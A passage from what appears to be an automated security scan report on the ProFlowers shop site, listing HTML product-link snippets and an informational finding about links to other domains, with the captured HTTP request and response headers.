="exitMVTFreeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Red-Roses-496?viewpos=27&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inredrose_dkbsktrb09CAT_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Red Roses" border="0" /></a>
...[SNIP]...
ails - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/pottedroses/Potted-Red-Roses-496?viewpos=27&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/plants/Potted-Double-Stem-Kaleidoscope-Orchid-12115?viewpos=28&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblkalblktin08_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Double Stem Kaleidoscope Orchid" border="0" /></a>
...[SNIP]...
der="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Double-Stem-Kaleidoscope-Orchid-12115?viewpos=28&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-White-Azalea-42580?viewpos=29&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inwhtazalea_crmurn11_PC1080_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted White Azalea" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-White-Azalea-42580?viewpos=29&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
itMVTFreeVase=false" href="http://products.proflowers.com/flowers/12-Months-of-Plants-30005196?viewpos=30&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_12months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="12 Months of Plants" border="0" /></a>
...[SNIP]...
- Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/12-Months-of-Plants-30005196?viewpos=30&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eVase=false" href="http://products.proflowers.com/plants/Potted-Double-Stem-White-Orchid-12117?viewpos=31&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6indblwhtphal_willow09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Double Stem White Orchid" border="0" /></a>
...[SNIP]...
ow" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Double-Stem-White-Orchid-12117?viewpos=31&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/wreath/Remembrance-Wreath--Preserved-1969?viewpos=32&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTremembrance09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Remembrance Wreath - Preserved " border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/wreath/Remembrance-Wreath--Preserved-1969?viewpos=32&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/6-Months-of-Plants-30005195?viewpos=33&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_6months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="6 Months of Plants" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/6-Months-of-Plants-30005195?viewpos=33&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/plants/A-Mothers-Love-Heart-Bamboo-10519?viewpos=34&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLThrtbmboo_pinkceramic11_PC1939_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="A Mother&#39;s Love Heart Bamboo" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/A-Mothers-Love-Heart-Bamboo-10519?viewpos=34&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
reeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-Garden-30003140?viewpos=35&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORC6inphaltilandsia_curn09_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mother&#39;s Day Orchid Garden" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Mothers-Day-Orchid-Garden-30003140?viewpos=35&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/flowers/3-Months-of-Plants-30005193?viewpos=36&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BBMplants09_3months_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="3 Months of Plants" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/3-Months-of-Plants-30005193?viewpos=36&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
TFreeVase=false" href="http://products.proflowers.com/flowers/Sun-and-Moon-Orchid-Garden-42863?viewpos=37&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCwhtphalylwbrom07_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sun and Moon Orchid Garden" border="0" /></a>
...[SNIP]...
uy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Sun-and-Moon-Orchid-Garden-42863?viewpos=37&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
alse" href="http://products.proflowers.com/flowers/Love-and-Lavender-Wreath-Preserved-30004517?viewpos=38&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTlavendarluxe_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Love and Lavender Wreath- Preserved" border="0" /></a>
...[SNIP]...
der="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Love-and-Lavender-Wreath-Preserved-30004517?viewpos=38&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
p://products.proflowers.com/wreath/Herbal-Sentiments-Wreath-with-Keepsake-Book--Preserved-1453?viewpos=39&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTherbal09book_m?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Herbal Sentiments Wreath with Keepsake Book - Preserved" border="0" /></a>
...[SNIP]...
="exitMVTFreeVase=false" href="http://products.proflowers.com/wreath/Herbal-Sentiments-Wreath-with-Keepsake-Book--Preserved-1453?viewpos=39&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/sympathy/Sympathy-Wreath--Preserved-589?viewpos=40&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/WRTsympathy_l?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Sympathy Wreath - Preserved " border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/sympathy/Sympathy-Wreath--Preserved-589?viewpos=40&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
lick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/I-Heart-Mom-30046358?viewpos=41&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/ORCdblorchidheart_silvervasepink11_PC1936_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="I Heart Mom" border="0" /></a>
...[SNIP]...
"Details - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/I-Heart-Mom-30046358?viewpos=41&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
eeVase=false" href="http://products.proflowers.com/flowers/Spring-Morning-Bulb-Garden-30008187?viewpos=42&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/BLB7ineastergarden_yelwatercan09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Mom...s Morning Bulb Garden" border="0" /></a>
...[SNIP]...
Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Spring-Morning-Bulb-Garden-30008187?viewpos=42&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
FreeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=43&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6incallapnk_victin11_PC1601_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Pink Calla Lily for Mom" border="0" /></a>
...[SNIP]...
y Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Potted-Pink-Calla-Lily-for-Mom-494?viewpos=43&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
xitMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT4incampanula_dblbskt09_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Canterbury Bells Garden" border="0" /></a>
...[SNIP]...
s - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Canterbury-Bells-Garden-9019?viewpos=44&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
VTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=45&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inpnkroseblucampanula_victin10_2_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Victorian Rose Garden" border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Country-Cottage-Garden-30008420?viewpos=45&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
MVTFreeVase=false" href="http://products.proflowers.com/plants/Fragrant-Gardenia-Topiary-11846?viewpos=46&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6ingardtop_fpc08_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Fragrant Gardenia Topiary" border="0" /></a>
...[SNIP]...
Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/plants/Fragrant-Gardenia-Topiary-11846?viewpos=46&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
"exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=47&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:198px;width:170px;"><img height="198px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/image.proflowers.com/is/image/ProvideCommerce/PLT6inrosylwurn_victin10_PF?nanos=770&amp;qlt=75,1&amp;resMode=sharp2&amp;op_usm=0.5,1.0,0.0,0&amp;wid=170&amp;hei=198" alt="Potted Yellow Rose" border="0" /></a>
...[SNIP]...
ils - Buy Now" border="0" onclick="exitMVTFreeVase=false" href="http://products.proflowers.com/flowers/Potted-Yellow-Roses-43183?viewpos=47&amp;trackingpgroup=PBS&amp;tile=hmpg_podA&amp;Ref=HomeNoRef"><img class="buyNow" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="" border="0" /></a>
...[SNIP]...
<div id="PFCfooterRibbonImage"> <img class="Ribbon25Mil" border="0" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" border="0" /> </div>
...[SNIP]...
:emailInput" type="text" value="Enter Your Email Here" id="_ctl29_emailInput" class="textBox" onclick="javascript:this.value=&#39;&#39;;" onkeypress="return CaptureEnterInEmailEntry(footerClientID)" /><img onclick="SetEmailEntryUrl()" class="sch_smallGo" src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/transparentpixel.gif" alt="Sign Up for Email Savings" width="17" height="18" border="0" /></div>
...[SNIP]...
<a href="javascript:O_LC();" ><img src="https://a248.e.akamai.net/7/248/497/0001/www.proflowers.com/siteimages/sm_FFF_oo.gif" border="0" width="9" height="9" style="vertical-align:middle;" title="site feedback"></a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.prvd.com/Careers_Overview.aspx">CAREERS</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/privacy.aspx">PRIVACY POLICY</a>
...[SNIP]...
</a><a rel="nofollow" href="http://www.providecommerce.com/terms.aspx">TERMS OF USE</a>
...[SNIP]...
he freshest flowers, guaranteed to last at least 7 days." border="0" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:124px;"><img class="footerLogo_PFC" height="61px" width="124px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The freshest flowers, guaranteed to last at least 7 days." border="0" /></a> <a title="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proplants.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:117px;"><img class="footerLogo_PLA" height=61px width=117px class="footerLogo_PLA" height="61px" width="117px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="A wide selection of green and exotic plants, perfect for gift and home d..cor." border="0" /></a> <a title="International flower delivery" border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.proflowers.com/international?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:132px;"><img class="footerLogo_PFCint" height=61px width=132px class="footerLogo_PFCint" height="61px" width="132px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="International flower delivery" border="0" /></a> <a title="The place for unique and personalized gifts." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.redenvelope.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:156px;"><img class="footerLogo_RED" height=61px width=156px class="footerLogo_RED" height="61px" width="156px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="The place for unique and personalized gifts." 
border="0" /></a> <a title="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" rel="nofollow" onclick="exitMVTFreeVase=false" href="http://www.cherrymoonfarms.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:170px;"><img class="footerLogo_CMF" height=61px width=170px class="footerLogo_CMF" height="61px" width="170px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Farm fresh fruit, gift baskets and delicious hand-made sweets." border="0" /></a><a title="Unique personalized gifts for life...s special occasions." border="0" onclick="exitMVTFreeVase=false" href="http://www.personalcreations.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:179px;"><img class="footerLogo_PCR" height=61px width=179px class="footerLogo_PCR" height="61px" width="179px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Unique personalized gifts for life...s special occasions." border="0" /></a> <a title="Gourmet hand-dipped berries, cookies and cakes." border="0" onclick="exitMVTFreeVase=false" href="http://www.berries.com/?tile=hmpg_podA&amp;Ref=HomeNoRef" style="height:61px;width:89px;"><img class="footerLogo_SHB" height=61px width=89px class="footerLogo_SHB" height="61px" width="89px" src="http://a1128.g.akamai.net/7/1128/497/0001/www.proflowers.com//siteimages/transparentpixel.gif" alt="Gourmet hand-dipped berries, cookies and cakes." border="0" /></a>
...[SNIP]...
</div><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/bookmark.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
horized use is prohibited.* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. US 6606581, 6421724, 6785717 B1 and other patents pending.* http://www.opinionlab.com--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/onlineopinionf3c/oo_engine.js?siteversionnumber=2011.05.07.2"></script><!--ooend--><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/swfobject.js?siteversionnumber=2011.05.07.2"></script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/tvvideopopup.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/omniture/s_code.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...
</script><script src="https://cdn.mercent.com/js/tracker.js" type="text/javascript"></script>
...[SNIP]...
<noscript><img src="http://link.mercent.com/image.ashx?merchantID=ProFlowers" style="display: none;"></noscript>
...[SNIP]...
</span> <script language="javascript" type="text/javascript" src="http://a1128.g.akamai.net/7/1128/497/0001/origin.prvd.com/client/javascript/certona/resxclsa.js?siteversionnumber=2011.05.07.2"></script>
...[SNIP]...

16.31. http://www.proflowers.com/mothers-day-flowers-MDF

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.proflowers.com
Path:   /mothers-day-flowers-MDF

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /mothers-day-flowers-MDF?tile=hmpg_hero1&Ref=HomeNoRef HTTP/1.1
Host: www.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.proflowers.com%25252Fmothers-day-flowers-MDF%25253Ftile%25253Dhmpg_hero1%252526Ref%25253DHomeNoRef%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; domain=.proflowers.com; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:22 GMT
Content-Length: 238190


<noscript>
<div class="splashBox">
   <font style="font-size:16pt;color: #fff786;margin: 10px;">We&rsquo;re Sorry - </font>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not ha
...[SNIP]...
<p>
   1) Enable Javascript. To find out how: <A href="https://www.google.com/support/adsense/bin/answer.py?answer=12654" target="_blank">click here</a>
...[SNIP]...
